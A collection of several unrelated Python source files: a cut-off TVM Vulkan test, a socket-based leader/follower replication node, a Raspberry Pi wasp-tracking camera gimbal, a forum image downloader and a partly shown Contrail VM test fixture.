lambda i: tvm.tir.Select(
A[i] >= 0, A[i] + tvm.const(1, dtype),
tvm.const(0, dtype)), name='B')
s = tvm.create_schedule(B.op)
(bx, tx) = s[B].split(s[B].op.axis[0], factor=128)
(tx, vx) = s[B].split(tx, factor=4)
s[B].bind(bx, tvm.thread_axis("blockIdx.x"))
s[B].bind(tx, tvm.thread_axis("threadIdx.x"))
s[B].vectorize(vx)
f = tvm.build(s, [A, B], target)
# Verify we generate the boolx4 type declaration and the OpSelect
# v4{float,half,int} instruction
assembly = f.imported_modules[0].get_source()
matches = re.findall("%v4bool = OpTypeVector %bool 4", assembly)
assert len(matches) == 1
matches = re.findall("OpSelect %v4.*", assembly)
assert len(matches) == 1
check_correct_assembly('float32')
check_correct_assembly('int32')
check_correct_assembly('float16')
tx = tvm.thread_axis("threadIdx.x")
bx = tvm.thread_axis("blockIdx.x")
def test_vulkan_copy():
def check_vulkan(dtype, n):
if not tvm.vulkan(0).exist or not tvm.runtime.enabled("vulkan"):
print("skip because vulkan is not enabled..")
return
A = tvm.placeholder((n,), name='A', dtype=dtype)
ctx = tvm.vulkan(0)
a_np = np.random.uniform(size=(n,)).astype(A.dtype)
a = tvm.nd.empty((n,), A.dtype, ctx).copyfrom(a_np)
b_np = a.asnumpy()
tvm.testing.assert_allclose(a_np, b_np)
tvm.testing.assert_allclose(a_np, a.asnumpy())
for _ in range(100):
dtype = np.random.choice(["float32", "float16", "int8", "int32"])
logN = np.random.randint(1, 15)
peturb = np.random.uniform(low=0.5, high=1.5)
check_vulkan(dtype, int(peturb * (2 ** logN)))
def test_vulkan_vectorize_add():
num_thread = 8
def check_vulkan(dtype, n, lanes):
if not tvm.vulkan(0).exist or not tvm.runtime.enabled("vulkan"):
print("skip because vulkan is not enabled..")
return
A = tvm.placeholder((n,), name='A', dtype="%sx%d" % (dtype, lanes))
B = tvm.compute((n,), lambda i: A[i]+tvm.const(1, A.dtype), name='B')
s = tvm.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=num_thread)
s[B].bind(xo, bx)
s[B].bind(xi, tx)
fun = tvm.build(s, [A, B], "vulkan")
ctx = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, ctx).copyfrom(
np.random.uniform(size=(n, lanes)))
c = tvm.nd.empty((n,), B.dtype, ctx)
fun(a, c)
tvm.testing.assert_allclose(c.asnumpy(), a.asnumpy() + 1)
check_vulkan("float32", 64, 2)
check_vulkan("float16", 64, 2)
def test_vulkan_stress():
"""
Launch a randomized test with multiple kernels per stream, multiple uses of
kernels per stream, over multiple threads.
"""
import random
import threading
n = 1024
num_thread = 64
def run_stress():
def worker():
if not tvm.vulkan(0).exist or not tvm.runtime.enabled("vulkan"):
print("skip because vulkan is not enabled..")
return
A = tvm.placeholder((n,), name='A', dtype="float32")
B = tvm.placeholder((n,), name='B', dtype="float32")
functions = [
(lambda: tvm.compute((n,), lambda i: 2 * A[i] + 3 * B[i]),
lambda a, b: 2 * a + 3 * b),
(lambda: tvm.compute((n,), lambda i: A[i]+B[i]),
lambda a, b: a + b),
(lambda: tvm.compute((n,), lambda i: A[i]+2 * B[i]),
lambda a, b: a + 2 * b),
]
def build_f(f_ref):
(C_f, ref) = f_ref
C = C_f()
s = tvm.create_schedule(C.op)
xo, xi = s[C].split(C.op.axis[0], factor=num_thread)
s[C].bind(xo, bx)
s[C].bind(xi, tx)
fun = tvm.build(s, [A, B, C], "vulkan")
return (fun, ref)
fs = [build_f(random.choice(functions))
for _ in range(np.random.randint(low=1, high=10))]
ctx = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, ctx).copyfrom(
np.random.uniform(size=(n,)))
b = tvm.nd.empty((n,), B.dtype, ctx).copyfrom(
np.random.uniform(size=(n,)))
cs = [tvm.nd.empty((n,), A.dtype, ctx) for _ in fs]
for ((f, _), c) in zip(fs, cs):
f(a, b, c)
for ((_, ref), c) in zip(fs, cs):
tvm.testing.assert_allclose(
c.asnumpy(), ref(a.asnumpy(), b.asnumpy()))
ts = [threading.Thread(target=worker)
for _ in range(np.random.randint(1, 10))]
for t in ts:
t.start()
for t in ts:
t.join()
run_stress()
if __name__ == "__main__":
test_vector_comparison()
test_vulkan_copy()
test_vulkan_vectorize_add()
test_vulkan_stress()
|
node_3.py
|
import socket
import multiprocessing as mp
import time
import json
node_id = 3
#stored_string = ""
nodes = [1,2,3,4,5]
manager = mp.Manager()
node_wise_write_update = manager.list([0]*5)
stored_string = manager.list([""])
node_status = [0,0,0,0,0]
leader_node_id = 0
start = time.time()
def convert(string):
global node_status
node_status = list(string.split(" "))
for i in range(0, len(node_status)):
node_status[i] = int(node_status[i])
#print(node_status)
#return li
def get_master_copy_from_leader(leader_id, node_id):
if node_id>=4:
if leader_id>=4:
IP = '0.0.0.0'
else:
IP = '34.243.81.104'
if node_id<4:
if leader_id<4:
IP = '0.0.0.0'
else:
IP = '3.16.164.181'
print("Initiate master copy download...................................")
port = ((90+leader_id)*100) + node_id
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(3.0)
try:
client.connect((IP, port))
except socket.error, e:
print("Socket error: ", e)
return
send_download_request = 'request_master_copy'
client.send(send_download_request)
from_leader = client.recv(4096)
print(from_leader)
#node_status[node_id-1] = True
#node_age[node_id-1] = rcvd_mssg["age"]
client.close()
return from_leader
def read_from_file():
global stored_string
with open('persistent_storage.txt', 'r') as file:
data = file.read()
stored_string[0] = data
def node_start_up(node_id):
global leader_node_id
global stored_string
global node_status
IP= '34.243.81.104'
print("Node start up initiated...................................")
port = (50000) + node_id
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(3.0)
try:
client.connect((IP, port))
except socket.error, e:
print("Socket error: ", e)
return
send_download_request = 'ping_new_node'
client.send(send_download_request)
from_server = client.recv(4096)
print(from_server)
rcvd_mssg = json.loads(from_server)
leader_node_id = int(rcvd_mssg["leader_node_id"])
#node_status[node_id-1] = True
#node_age[node_id-1] = rcvd_mssg["age"]
convert(rcvd_mssg["node_status"])
if sum(node_status) == 0:
read_from_file()
print("Local copy updated at start-up from file: ", stored_string[0])
else:
stored_string[0] = get_master_copy_from_leader(leader_node_id, node_id)
if stored_string[0] is None or stored_string[0]=="blank":
stored_string[0] =''
print('New nodes local copy updated to: ', stored_string[0])
client.close()
node_start_up(node_id)
def connect_with_followers(leader_id, node_id, value_to_be_written):
if node_id>=4:
if leader_id>=4:
IP = '0.0.0.0'
else:
IP = '3.16.164.181'
if node_id<4:
if leader_id<4:
IP = '0.0.0.0'
else:
IP = '34.243.81.104'
port = ((leader_id+10)*1000) + node_id
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(3.0)
print('Leader connected with socket: ', port)
try:
client.connect((IP, port))
except socket.error, e:
print("Socket error: ", e)
node_wise_write_update[node_id-1]=0
return
message_to_followers = value_to_be_written
client.send(message_to_followers)
from_server = client.recv(4096)
client.close()
print(from_server)
#if int(from_server)==1:
if (from_server=="1"):
node_wise_write_update[node_id-1]=1
def initiate_multicast(value_to_be_written):
# pop up multiple processes
print('Multicast initiated...................................')
global nodes
global node_status
global leader_node_id
multi_cast_procs = []
for i in range(0,len(nodes)):
#print(' For i: ', i)
# connect to node only if it's active and the node is not the leader itself
print(' For i: ', i, ' Node status: ', node_status[i], ' node number: ', nodes[i])
if (node_status[i]==1 and nodes[i]!=leader_node_id):
p = mp.Process(target=connect_with_followers, args=(leader_node_id,nodes[i],value_to_be_written,))
multi_cast_procs.append(p)
p.start()
p.join()
#time.sleep(2)
time.sleep(2)
# check if all active nodes were updated with the latest write
write_transaction_fail_count = 0
for j in range(0,len(nodes)):
if write_transaction_fail_count>1:
return 0 # indicating failure
if j == (leader_node_id-1):
continue # skip for the leader itself
if (node_status[j]==1 and node_wise_write_update[j]==0):
write_transaction_fail_count = write_transaction_fail_count + 1
return 1
def listen_new_nodes_as_leader(leader_id, node_id):
# printing process id
#global stored_string
print("Acting as a leader for new nodes..............................")
port = ((90+leader_id)*100) + node_id
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind(('0.0.0.0', port))
except socket.error, e:
skip_temp = 0
print('Listening to any new nodes at port : ', port)
serv.listen(5)
while True:
conn, addr = serv.accept()
from_new_node = ''
while True:
data = conn.recv(4096)
if not data: break
from_new_node += data
print('Received message from Node ', node_id, ' : ', from_new_node)
message_master_copy=stored_string[0]
if message_master_copy=='':
print("Yes blank message detected.. converted to None")
message_master_copy = "blank"
conn.send(message_master_copy)
conn.close()
print('Connection closed at leaders end....................................')
#print('sending from: ', port)
#def leader_broadcast():
def initiate_leader_to_new_node():
# pop up multiple processes
print('Initiate leader_to_new_node initiated...................................')
global nodes
global node_status
global leader_node_id
listen_new_node_procs = []
for i in range(0,len(nodes)):
# connect to node only if it's active and the node is not the leader itself
#if (node_status[i]==1 and nodes[i]!=leader_node_id):
if (nodes[i]!=leader_node_id):
p = mp.Process(target=listen_new_nodes_as_leader, args=(leader_node_id,nodes[i],))
listen_new_node_procs.append(p)
p.start()
#p.join()
def write_to_file():
global stored_string
text_file = open("persistent_storage.txt", "w")
text_file.write(stored_string[0])
text_file.close()
print("---------------- Written to File ----------------------")
def server_connect(node_id):
# printing process id
global node_status
global leader_node_id
global stored_string
global start
sole_replica_first_time = False
last_time_heard_from_cluster = time.time()
port = (10000) + node_id
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind(('0.0.0.0', port))
except socket.error, e:
skip_temp = 0
print('Listening at: ', port)
serv.listen(5)
while True:
conn, addr = serv.accept()
from_client = ''
temp_variable = False
while True:
data = conn.recv(4096)
if not data: break
from_client += data
print(from_client)
rcvd_mssg = json.loads(from_client)
if rcvd_mssg["activity"]=="node_status_check":
print('Node status check received.....................................')
age = time.time() - start
response_message = '{"age":' + str(round(age,2)) + '}'
conn.send(response_message)
if rcvd_mssg["activity"]=="group_update":
print('Group update received...........................................')
#if rcvd_mssg["leader_node_id"]==node_id:
response_message = 'Group update received by Node ' + str(node_id)
conn.send(response_message)
##############################################################################################
this_time_heard = time.time()
print ("xxxxxxxxxxxxxxxxxxx ", this_time_heard-last_time_heard_from_cluster, " xxxxxxxxxxxx")
if (this_time_heard-last_time_heard_from_cluster)>40:
print("Yes more time taken")
start = time.time()
node_start_up(node_id)
last_time_heard_from_cluster = time.time()
##############################################################################################
# update local copy of leader_node_id
leader_node_id = int(rcvd_mssg["leader_node_id"])
# update local copy of node_status
convert(rcvd_mssg["node_status"])
print('updated local copy of node_status: ', node_status)
if sum(node_status)==1 and node_status[node_id-1]==1 and sole_replica_first_time==False:
######## print("xxxxxxxxxxxxxxxxxxx Written local copy to disk xxxxxxxxxxxxxxxxxxx")
sole_replica_first_time = True
write_to_file()
if sum(node_status)>1:
sole_replica_first_time=False
if rcvd_mssg["leader_node_id"]!=node_id:
# close connection as the next following function call exits the function
#conn.close()
#print('Connection closed at listeners end (listener to client)....................................')
# act as follower (listen to leader) (single process)
temp_variable = True
#listen_to_leader(leader_node_id, node_id)
#print("ignore me")
if rcvd_mssg["leader_node_id"]==node_id:
initiate_leader_to_new_node()
if rcvd_mssg["activity"]=="write_request":
print('Write request received...........................................')
# only possible when this node is leader
# update the local copy of the leader
stored_string[0] = stored_string[0] + rcvd_mssg["value_to_be_written"]
print('Leaders local copy updated to ........', stored_string[0])
# act as leader and send to all nodes (client function). Need to run multiple processes
result = initiate_multicast(rcvd_mssg["value_to_be_written"])
print("Write status update from all followers: ", result)
response_message = str(result)
conn.send(response_message)
if sum(node_status)==1 and node_status[node_id-1]==1:
######## print("xxxxxxxxxxxxxxxxxxx Written local copy to disk xxxxxxxxxxxxxxxxxxx")
write_to_file()
if rcvd_mssg["activity"]=="read_request":
# only possible when the node is the leader
response_message = stored_string[0]
conn.send(response_message)
#message = "I am node " + str(node_id) + 'alive since ' + str(age)
#if activity = write and leader = this node, then update array and run leader broadcast function
#if activity = write and leader = others, then run server function to listen to broadcasts and confirm back if updated array
conn.shutdown(1)
conn.close()
print('Connection closed at listeners end (listener to client)....................................')
if temp_variable==True:
print('temp variable is true.....')
p1 = mp.Process(target=listen_to_leader, args=(leader_node_id, node_id,))
p1.start()
#listen_to_leader(leader_node_id, node_id)
print('moving ahead........')
#print('sending from: ', port)
def listen_to_leader(leader_id, node_id):
# printing process id
#global stored_string
print("Acting as a follower to Node: ", leader_id, "..............................")
port = ((leader_id+10)*1000) + node_id
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind(('0.0.0.0', port))
except socket.error, e:
skip_temp = 0
print('Listening to the leader at port : ', port)
serv.listen(5)
while True:
conn, addr = serv.accept()
from_leader = ''
while True:
data = conn.recv(4096)
if not data: break
from_leader += data
print('Received message from Node ', leader_id, ' : ', from_leader)
stored_string[0] = stored_string[0] + from_leader
# just update local copy of the array (as a follower)
print('Local copy updated to ', stored_string[0])
#message = '{"age":' + str(round(age,2)) + '}'
#message = "received update at node: " + str(node_id)
message="1"
conn.send(message)
conn.close()
print('Connection closed at listeners end (listener to leader)....................................')
#print('sending from: ', port)
#def leader_broadcast():
#p1 = mp.Process(target=server_connect, args=(node_id,))
#p1.start()
server_connect(node_id)
|
gimbalWasp02.py
|
import cv2
import sys
import time
import numpy
import random
from multiprocessing import Process
from multiprocessing import Queue
from picamera.array import PiRGBArray
from picamera import PiCamera
from adafruit_servokit import ServoKit
kit = ServoKit(channels=8)
kit.servo[0].angle = 110 # y
kit.servo[1].angle = 90 # x
#hacked from:
#https://software.intel.com/articles/OpenVINO-Install-RaspberryPI
#https://opencv2-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html
#https://github.com/PINTO0309/MobileNet-SSD-RealSense/blob/master/SingleStickSSDwithUSBCamera_OpenVINO_NCS2.py
#https://raspberrypi.stackexchange.com/questions/87062/overhead-counter
#Les Wright Dec 24 2018
#modified to support picam 30 Dec 2018
#Robot code incorportated on 17 Jan 2019
count = 0
count2 = 0
def motion(xminQueue,xmaxQueue,yminQueue,ymaxQueue):
def left(stime):
myXAngle = myXAngle -1
kit.servo[1].angle = myXAngle
sustain(stime)
def right(stime):
myXAngle = myXAngle +1
kit.servo[1].angle = myXAngle
def sustain(stime):
time.sleep(stime)
stop()
def stop():
kit.servo[1].angle = 90
def hunt():
right(0.2)
stop()
stop()
start = time.time() #start a timer
myXAngle = 90
myYAngle = 110
while True:
if not xminQueue.empty():
xmin = xminQueue.get()
xmax = xmaxQueue.get()
#print(str(xmin)+' '+str(xmax))
midpointX = (xmin+xmax)/2
width = xmax-xmin
#print("W:"+str(width))
#stime = 1 # seconds
#sustain(stime)
#stime = abs(150-midpointX)/3000
#print(str(stime))
#align midoint with middle of the frame
if midpointX < 140:
myXAngle = myXAngle +0.1
kit.servo[1].angle = myXAngle
if midpointX > 160:
myXAngle = myXAngle -0.1
kit.servo[1].angle = myXAngle
start = time.time() #reset the timer
if not yminQueue.empty():
ymin = yminQueue.get()
ymax = ymaxQueue.get()
#print(str(xmin)+' '+str(xmax))
midpointY = (ymin+ymax)/2
width = ymax-ymin
#print("M:"+str(midpointY))
#print("W:"+str(width))
#print("Mx: "+str(midpointX) + " My: " +str(midpointY) )
#stime = abs(150-midpointY)/3000
#sustain(stime)
#print(str(stime))
#align midoint with middle of the frame
if midpointY < 140:
myYAngle = myYAngle -0.2
kit.servo[0].angle = myYAngle
if midpointY > 160:
myYAngle = myYAngle +0.2
kit.servo[0].angle = myYAngle
start = time.time() #reset the timer
if xminQueue.empty():
seconds = time.time()-start
if seconds > 0.8: #if we are empty for longer than 0.8 sec, we probably lost the target...
#print('Hunting...')
#hunt()
start = time.time() #reset the timer
# initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the child process
xminQueue = Queue(maxsize=1)
xmaxQueue = Queue(maxsize=1)
yminQueue = Queue(maxsize=1)
ymaxQueue = Queue(maxsize=1)
# construct a child process indepedent from our main process
print("[INFO] starting motion handling process...")
p2 = Process(target=motion, args=(xminQueue,xmaxQueue,yminQueue,ymaxQueue))
p2.daemon = True
p2.start()
labels_file = 'models/labels.txt'
with open(labels_file, 'r') as f:
labels = [x.strip() for x in f]
#print(labels)
# Note cv2.dnn.blobFromImage, the size is present in the XML files, we could write a preamble to go get that data,
# Then we dont have to explicitly set it!
# Load the model
net = cv2.dnn.readNet('models/wasp.xml', 'models/wasp.bin')
# Specify target device
net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)
#Misc vars
font = cv2.FONT_HERSHEY_SIMPLEX
frameWidth = 600
frameHeight = 600
framesPerSec = 24
##frameWidth = 640
##frameHeight = 480
##framesPerSec = 12
secPerFrame = 0.0
detections = 0.0
confThreshold = 0.5
#initialize the camera and grab a reference to the raw camera capture
#well this is interesting, we can closely match the input of the network!
#this 'seems' to have improved accuracy!
camera = PiCamera()
camera.resolution = (304, 304)
camera.framerate = 20
rawCapture = PiRGBArray(camera, size=(304, 304))
# allow the camera to warmup
time.sleep(0.1)
#print(labels)
#seconds4 = 0.000000001
#define the function that handles our processing thread
def classify_frame(net, inputQueue, outputQueue):
# keep looping
while True:
# check to see if there is a frame in our input queue
start4 = time.time()
if not inputQueue.empty():
# grab the frame from the input queue, resize it, and
# construct a blob from it
frame = inputQueue.get()
resframe = cv2.resize(frame, (300, 300))
blob = cv2.dnn.blobFromImage(frame, size=(300, 300), ddepth=cv2.CV_8U)
#net.setInput(blob)
#blob = cv2.dnn.blobFromImage(resframe, 0.007843, size=(300, 300),\
#mean=(127.5,127.5,127.5), swapRB=False, crop=False)
net.setInput(blob)
out = net.forward()
# write the detections to the output queue
outputQueue.put(out)
end4 = time.time()
seconds4 = end4-start4
print("\033[1;35;40m grab ..... blob from it delay seconds: "+str(seconds4))
#sys.stdout.write("\033[F")
# initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the child process
inputQueue = Queue(maxsize=1)
outputQueue = Queue(maxsize=1)
out = None
# construct a child process *indepedent* from our main process of
# execution
print("[INFO] starting inference process...")
p = Process(target=classify_frame, args=(net,inputQueue,outputQueue,))
p.daemon = True
p.start()
print("[INFO] starting capture...(loading model) .....")
print("")
#time the frame rate....
start = time.time()
frames = 0
#confidence = 0.00
for frame in camera.capture_continuous(rawCapture, format="rgb", use_video_port=True):
# Capture frame-by-frame
frame = frame.array
# if the input queue *is* empty, give the current frame to
# classify
if inputQueue.empty():
inputQueue.put(frame)
# if the output queue *is not* empty, grab the detections
if not outputQueue.empty():
out = outputQueue.get()
# check to see if 'out' is not empty
if out is not None:
# loop over the detections
# Draw detections on the frame
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
obj_type = int(detection[1]-1)
xmin = int(detection[3] * frame.shape[1])
ymin = int(detection[4] * frame.shape[0])
xmax = int(detection[5] * frame.shape[1])
ymax = int(detection[6] * frame.shape[0])
#bottle = 4, person = 14 , dog = 11
#if obj_type == 1: #Our object
obj_type == 1 #Our object
if confidence > confThreshold:
#bounding box
start2 = time.time()
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 255))
#label
cv2.rectangle(frame, (xmin-1, ymin-1),\
(xmin+70, ymin-10), (0,255,255), -1)
#labeltext
cv2.putText(frame,labels[obj_type]+' '+str(round(confidence,2)),\
(xmin,ymin-2), font, 0.3,(0,0,0),1,cv2.LINE_AA)
detections += 1
end2 = time.time()
seconds2 = end2-start2
xmaxQueue.put(xmax)
xminQueue.put(xmin)
ymaxQueue.put(ymax)
yminQueue.put(ymin)
# Display the resulting frame
start3 = time.time()
cv2.putText(frame,'Threshold: '+str(round(confThreshold,1)), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 0, 0), 1, cv2.LINE_AA)
cv2.namedWindow('frame',cv2.WINDOW_NORMAL)
cv2.resizeWindow('frame',frameWidth,frameHeight)
cv2.imshow('frame',frame)
end3 = time.time()
seconds3 = end3-start3
frames+=1
#for num in range(10): #to iterate on the factors of the number
count = count +1
if count == 500: #to determine the first factor
end = time.time()
count2 = count2 +1
seconds = end-start
fps = frames/seconds
dts = detections/seconds
start = time.time() #start timer again
frames = 0
detections = 0
#print("Current confidence: "+ str(confidence))
if dts == 0:
print("\033[1;32;40m .... loading model ..... "+str(count2) +"/11" +"\033[0;37;40m")
sys.stdout.write("\033[F") # Cursor up one line
else:
i = 0
detections = 0.0001
print("\033[1;36;40m Frames Per Sec: "+str(fps))
print(" Detections Per Sec: "+str(dts))
print(" Draw rectangle and text delay seconds: "+str(seconds2))
print(" Display the resulting screen delay seconds: "+str(seconds3))
#sys.stdout.write("\033[F")
#sys.stdout.write("\033[F")
#sys.stdout.write("\033[F")
#sys.stdout.write("\033[F")
#print("Seconds: "+str(seconds))
#print("Detections: "+str(detections))
print("")
count = 0
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
keyPress = cv2.waitKey(1)
if keyPress == 113:
break
if keyPress == 82:
confThreshold += 0.1
if keyPress == 84:
confThreshold -= 0.1
if confThreshold >1:
confThreshold = 1
if confThreshold <0:
confThreshold = 0
end = time.time()
seconds = end-start
fps = frames/seconds
print("Avg Frames Per Sec: "+str(fps))
dts = detections/seconds
print("Avg detections Per Sec: "+str(dts))
cv2.destroyAllWindows()
GPIO.cleanup()
|
dlXossip.py
|
#######################################################################################################################
# Image Downloader
#
#This code is to get links to images from image boards and download it responsibly
#
# Input variables:
#-->Forum Thread number
#-->Thread Start Page Number
#-->Thread End Page number
#-->Paralell download count
#-->File Save Location
#-->File sequential numbering or from source
#-->File prefix
#-->File Min Size
#-> verbose mode
#
#To add: verbose mode, post download deletion of poor images.
#######################################################################################################################
########Import libraries
from bs4 import BeautifulSoup
import re
import requests
import threading
import time
from urllib.parse import urlparse
import urllib.parse
import os
import argparse
from slugify import slugify
#########Input Variables#########
xossipThread = 1487535 #1086810
startPage = 6
endPage =10
threadCount = 10
saveLocation = "C:/Images/thrd1487535/"
fileprefix = "parser_"
useOriginalName = True
minKB = 5
######## Argument parser for command line
parser = argparse.ArgumentParser(description='This is a program to download images from Xossip.com threads.')
parser.add_argument( "Thread", metavar='ThreadId',
type=int,help='The thread id can be found in the URL. https://xossip.com/showthread.php?t=>1234567<')
parser.add_argument('startPage',metavar="Start-Page",type=int,help="Start downloads from Page Number")
parser.add_argument('endPage',metavar="End-Page",type=int,help="Download till Page Number")
parser.add_argument("-f", "--file",type=str, dest="saveLocation",help="Write images to FOLDER", metavar="FOLDER",required=True)
args = parser.parse_args()
xossipThread = args.Thread
startPage = args.startPage
endPage = args.endPage
saveLocation = args.saveLocation
#########This bit of code looks at the webpage and gets all the image urls#########
imageURL = []
for pageno in range(startPage,endPage+1):
print("\rScanning Page "+str(pageno)+"...",end=" ")
####Edit here for other websites
source = requests.get('https://www.xossip.com/showthread.php?t='+str(xossipThread)+'&page='+str(pageno))
soup = BeautifulSoup(source.text,'lxml')
for divtag in soup.find_all("div",id = re.compile("post_message_*")):
for imgtag in divtag.find_all('img',border ="0",alt="",src = re.compile("http*")):
#print(imgtag['src'])
imageURL.append(imgtag['src'])
######### This bit of code filters out non xossip URLs and downloads them#########
print("\nFound "+str(len(imageURL))+" images. Filtering...")
#print(imageURL)
imageURLfiltered = []
for domain in imageURL:
#print(urlparse(domain).netloc)
if "xossip" not in urlparse(domain).netloc:
imageURLfiltered.append(domain)
del imageURL
print("Filtered "+str(len(imageURLfiltered))+" image. Starting download...")
#print(imageURLfiltered)
#########This code downloads multiple images paralelly#########
if not os.path.exists(saveLocation):
os.makedirs(saveLocation)
def download(link, filelocation,minKB):
minSize = minKB*1000 #min file size to download in Bytes 5000 = 5KB
flag = True
r = requests.get(link, stream=True)
######Checks before download
#check for min file size if content length is reported by server
if r.headers.get("content-length"):
if int(r.headers.get("content-length"))<minSize:
flag = False
#Check for file datatype
if "image" not in r.headers["content-type"]:
flag = False
#Check for http errors
if r.status_code != requests.codes.ok:
flag = False
#If all above checks are ok the flag variable would be true
if flag:
#print(r.headers)
with open(filelocation, 'wb') as f:
for chunk in r.iter_content(1024):
if chunk:
f.write(chunk)
else:
print("Error downloading "+link)
def createNewDownloadThread(link, filelocation,minKB):
download_thread = threading.Thread(target=download, args=(link,filelocation,minKB))
download_thread.start()
for i in range(0,len(imageURLfiltered)):
if useOriginalName:
filesplit = urllib.parse.unquote(imageURLfiltered[i].split("/")[-1])
fileName = saveLocation + slugify(filesplit[:-4])+"."+slugify(filesplit[-3:])
else:
fileName = saveLocation +fileprefix+str(i)+"."+slugify(imageURLfiltered[i][-3:])
while(threading.active_count()>threadCount):
time.sleep(0.1)
print("\rDownloading "+str(i+1)+" of "+str(len(imageURLfiltered))+": "+imageURLfiltered[i]+"...",end=" ")
createNewDownloadThread(imageURLfiltered[i],fileName,minKB)
############Summary of download
|
multiple_vn_vm_test.py
|
# Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# n specific tests,
# You can do 'python -m testtools.run -l tests'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will try to pick params.ini in PWD
#
import os
from time import sleep
from common.openstack_libs import nova_client as mynovaclient
from common.openstack_libs import nova_exception as novaException
import fixtures
from common.contrail_test_init import ContrailTestInit
from vn_test import *
from quantum_test import *
from vnc_api_test import *
from nova_test import *
from vm_test import *
from common.connections import ContrailConnections
from floating_ip import *
from policy_test import *
from contrail_fixtures import *
from tcutils.util import *
import threading
import Queue
class create_multiple_vn_and_multiple_vm_fixture(fixtures.Fixture):
# @classmethod
def __init__(self, connections, inputs, policy_objs=[], subnets=[], project_name=None, image_name='ubuntu', flavor='contrail_flavor_tiny', vn_name=get_random_name('vn'), vm_name=get_random_name('vm'), vn_count=1, vm_count=2, subnet_count=2, af=None, userdata=None):
"""
creates a dict of the format: {vn_name:{vm_name:vm_obj,...}}
"""
self.connections = connections
self.inputs = inputs
if not project_name:
project_name = self.inputs.project_name
self.project_name = project_name
self.vn_name = vn_name
self.vn_count = vn_count
self.stack = af or self.inputs.get_af()
self.subnet_count = subnet_count
self.vm_name = vm_name
self.vm_count = vm_count
self.image_name = image_name
self.flavor = flavor
self.nova_h = self.connections.nova_h
self.q = Queue.Queue()
self.vn_threads = []
self.vm_threads = []
self.userdata = userdata
self.nova_h.get_image(self.image_name)
self.random_subnets = []
def calculateSubnetAF(self, af):
while True:
network=get_random_cidr(af=af, mask=SUBNET_MASK[af]['min'])
for rand_net in self.random_subnets:
if not cidr_exclude(network, rand_net):
break
else:
break
net, plen = network.split('/')
plen = int(plen)
max_plen = SUBNET_MASK[af]['max']
reqd_plen = max_plen - (int(self.subnet_count) - 1).bit_length()
if plen > reqd_plen:
max_subnets = 2 ** (max_plen - plen)
raise Exception("Network prefix %s can be subnetted "
"only to maximum of %s subnets" % (network, max_subnets))
subnets = list(IPNetwork(network).subnet(plen))
return map(lambda subnet: subnet.__str__(), subnets[:])
def calculateSubnet(self):
self.subnet_list = []
if 'v4' in self.stack or 'dual' in self.stack:
self.subnet_list.extend(self.calculateSubnetAF(af='v4'))
if 'v6' in self.stack or 'dual' in self.stack:
self.subnet_list.extend(self.calculateSubnetAF(af='v6'))
self.random_subnets.extend(self.subnet_list)
def createMultipleVN(self):
self.vn_obj_dict = {}
self.vn_keylist = []
self.vn_valuelist = []
for x in range(self.vn_count):
try:
vn_name = self.vn_name
vn_name = vn_name + str(x)
self.calculateSubnet()
vn_obj = VNFixture(
project_name=self.project_name, connections=self.connections,
vn_name=vn_name, inputs=self.inputs, subnets=self.subnet_list, af=self.stack)
vn_obj.setUp()
self.vn_keylist.append(vn_name)
self.vn_valuelist.append(vn_obj)
except Exception as e:
print e
raise
count = 0
self.vn_obj_dict = dict(zip(self.vn_keylist, self.vn_valuelist))
def createMultipleVM(self):
self.vm_obj_dict = {}
self.vm_keylist = []
self.vm_valuelist = []
self.vm_per_vn_dict = {}
self.vm_per_vn_list = []
# for each vn, creating the number of vms
start = 0
count = 0
try:
for k in self.vn_keylist:
self.vn_obj = self.vn_obj_dict[k].obj
for c in range(self.vm_count):
vm_name = get_random_name('%s_%s_%s' % (k, self.vm_name, c))
vm_fixture = VMFixture(connections=self.connections,
vn_obj=self.vn_obj, vm_name=vm_name, project_name=self.inputs.project_name,
userdata=self.userdata, image_name=self.image_name, flavor=self.flavor)
t = threading.Thread(target=vm_fixture.setUp, args=())
self.vm_threads.append(t)
count += 1
self.vm_keylist.append(vm_name)
self.vm_valuelist.append(vm_fixture)
self.vm_obj_dict = dict(
zip(self.vm_keylist, self.vm_valuelist))
self.vm_per_vn_list.append(self.vm_obj_dict)
self.vm_per_vn_dict = dict(
zip(self.vn_keylist, self.vm_per_vn_list))
except Exception as e:
print e
for thread in self.vm_threads:
time.sleep(3)
thread.start()
for thread in self.vm_threads:
thread.join(5)
def verify_vns_on_setup(self):
try:
result = True
verify_threads = []
for vn_name, vn_obj in self.vn_obj_dict.items():
t = threading.Thread(target=vn_obj.verify_on_setup, args=())
verify_threads.append(t)
for thread in verify_threads:
time.sleep(0.5)
thread.daemon = True
thread.start()
for thread in verify_threads:
thread.join(10)
for vn_name, vn_obj in self.vn_obj_dict.items():
if not vn_obj.verify_result:
result = result and False
except Exception as e:
print e
result = result and False
finally:
return result
def verify_vms_on_setup(self):
try:
result = True
verify_threads = []
for vm_fix in self.vm_valuelist:
t = threading.Thread(target=vm_fix.verify_on_setup, args=())
verify_threads.append(t)
for thread in verify_threads:
time.sleep(0.5)
# thread.daemon = True
thread.start()
for thread in verify_threads:
thread.join(60)
for vm_fix in self.vm_valuelist:
if not vm_fix.verify_vm_flag:
result = result and False
except Exception as e:
print e
result = result and False
finally:
return result
def wait_till_vms_are_up(self):
try:
result = True
verify_threads = []
for vm_fix in self.vm_valuelist:
